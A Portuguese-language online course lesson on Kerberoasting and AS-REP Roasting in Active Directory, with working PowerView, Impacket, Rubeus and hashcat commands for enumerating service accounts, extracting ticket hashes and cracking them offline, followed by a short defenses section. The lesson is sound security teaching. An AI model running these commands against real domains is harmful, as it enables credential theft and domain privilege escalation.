Kerberoasting e AS-REP Roasting
Solicite tíquetes de serviço Kerberos e quebre-os offline com o Hashcat.
Kerberoasting e AS-REP Roasting é uma aula grátis de Cyber Security Academy no CoddyKit. Esta é a aula 3 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Cyber Security Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Cyber Security Academy inclui 4 aulas no total.
Criptografia de tíquetes Kerberos
Os tíquetes de serviço são criptografados com o hash da senha da conta de serviço. Qualquer usuário do domínio pode solicitar um tíquete de serviço para qualquer SPN. Se a conta de serviço tiver uma senha fraca, o tíquete poderá ser quebrado off-line.
O que é a quebra de tíquetes Kerberos?
A quebra de tíquetes Kerberos solicita tíquetes de serviço para contas com Nomes de Principal de Serviço (SPNs), extrai o tíquete criptografado e o quebra off-line com o Hashcat. Não são necessários privilégios elevados — qualquer usuário do domínio pode fazer isso.
# Steps:
# 1. Find accounts with SPNs
# 2. Request their service tickets
# 3. Extract ticket hashes
# 4. Crack with HashcatLocalização de SPNs
Enumere todas as contas de serviço com SPNs usando PowerView, Impacket ou ferramentas nativas do AD. Os SPNs associam as contas de serviço aos respectivos serviços.
# PowerView (Windows)
Get-DomainUser -SPN
Get-NetUser -SPN | select name,serviceprincipalname
# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com
# Native LDAP query
ldapsearch -H ldap://dc -b "DC=corp,DC=com" \
"(servicePrincipalName=*)" cn servicePrincipalNameSolicitação e extração de tíquetes
O Rubeus (Windows) e o GetUserSPNs do Impacket (Linux) solicitam tíquetes e os exibem em um formato que pode ser quebrado.
# Rubeus (Windows)
Rubeus.exe kerberoast /format:hashcat /output:hashes.txt
# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com \
-request -outputfile hashes.txtQuebra com Hashcat
Os hashes obtidos na quebra de tíquetes Kerberos usam o modo 13100 (TGS-REP do Kerberos 5). Use uma lista de palavras robusta com regras para obter a máxima eficácia.
# Crack TGS-REP hashes
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
# With rules for better coverage
hashcat -m 13100 hashes.txt rockyou.txt -r best64.rule
# AES tickets: mode 19700 (AES128) or 19800 (AES256)O que é a quebra de AS-REP?
A quebra de AS-REP tem como alvo contas com a opção Não exigir pré-autenticação do Kerberos habilitada. O AS devolve um TGT criptografado com o hash do usuário — ele pode ser solicitado sem conhecer a senha e quebrado off-line.
Localização de contas com pré-autenticação desativada
Contas sem pré-autenticação indicam uma configuração incorreta, muitas vezes deixada por aplicativos antigos. Enumere-as com PowerView ou GetNPUsers.
# PowerView
Get-DomainUser -PreauthNotRequired
# Impacket GetNPUsers (no password needed!)
GetNPUsers.py CORP/ -usersfile users.txt \
-dc-ip dc.corp.com -format hashcat -outputfile asrep.txt
# Rubeus
Rubeus.exe asreproast /format:hashcat /output:asrep.txtQuebra de hashes AS-REP
Os hashes AS-REP usam o modo 18200 do Hashcat. O processo de quebra é igual ao da quebra de tíquetes Kerberos — um ataque de dicionário off-line contra a resposta AS criptografada.
# Crack AS-REP hashes
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
# With rules:
hashcat -m 18200 asrep.txt rockyou.txt -r best64.ruleAvaliação de impacto
As senhas de contas de serviço quebradas geralmente oferecem privilégios elevados — contas de serviço que executam bancos de dados, programas de backup ou o Exchange podem ser administradores do domínio. As contas AS-REP são frequentemente esquecidas e têm proteção insuficiente.
Quebra de tíquetes Kerberos direcionada
Se você tiver acesso de gravação a um objeto, poderá adicionar temporariamente um SPN a uma conta de alto valor, realizar a quebra de tíquetes Kerberos, quebrar o hash e remover o SPN em seguida — visando contas específicas sob demanda.
Defesas
Defesa contra a quebra de tíquetes Kerberos: use senhas longas e aleatórias (25 ou mais caracteres) para contas de serviço ou, melhor ainda, use contas de serviço gerenciadas por grupo (gMSA), com senhas de 120 caracteres que mudam automaticamente. Para AS-REP: habilite a pré-autenticação em todas as contas.
Verificação rápida
Qual atributo da conta é necessário para que a quebra de AS-REP funcione?
Resumo: quebra de tíquetes Kerberos e quebra de AS-REP
Os dois ataques exploram fragilidades na criptografia de tíquetes Kerberos para quebrar senhas off-line sem provocar bloqueios de conta. A quebra de tíquetes Kerberos tem como alvo contas com SPN (qualquer usuário do domínio pode realizá-la); a quebra de AS-REP tem como alvo contas sem pré-autenticação (não são necessárias credenciais). Proteja-se usando gMSA para contas de serviço e exigindo pré-autenticação para todos os usuários.
Perguntas Frequentes
A aula “Kerberoasting e AS-REP Roasting” é grátis?
Sim — o texto completo de “Kerberoasting e AS-REP Roasting” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Cyber Security Academy, atualize para CoddyKit PRO. O curso de Cyber Security Academy inclui 4 aulas no total.
O que vou aprender em “Kerberoasting e AS-REP Roasting”?
Solicite tíquetes de serviço Kerberos e quebre-os offline com o Hashcat. Você pratica Cyber Security Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.
Preciso ter experiência prévia para começar Cyber Security Academy?
Nenhuma experiência prévia é necessária. Cyber Security Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 3 de 4.
Quanto tempo leva a aula “Kerberoasting e AS-REP Roasting”?
A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.
Posso escrever e executar código nesta aula de Cyber Security Academy?
Sim. Cada aula de Cyber Security Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.
Todas as aulas deste curso
- Autenticação do Windows: NTLM e Kerberos
- Ataques Pass-the-Hash e Pass-the-Ticket
- Kerberoasting e AS-REP Roasting
- Fortalecimento do Active Directory